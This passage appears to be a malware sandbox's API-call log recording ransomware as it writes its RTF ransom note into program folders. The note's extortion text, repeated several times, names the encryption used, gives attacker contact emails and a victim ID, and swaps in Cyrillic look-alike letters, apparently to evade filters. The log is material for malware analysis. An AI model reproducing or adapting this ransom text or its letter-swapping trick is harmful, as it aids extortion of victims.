.\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0071.068] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x1e971a8, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0071.068] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e971a8*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x1e971a8*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0071.069] CloseHandle (hObject=0x1ec) returned 1 [0071.070] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\esp\\bg85_info.rtf")) returned 0xffffffff [0071.070] GetLastError () returned 0x2 [0071.070] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\esp\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0071.071] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 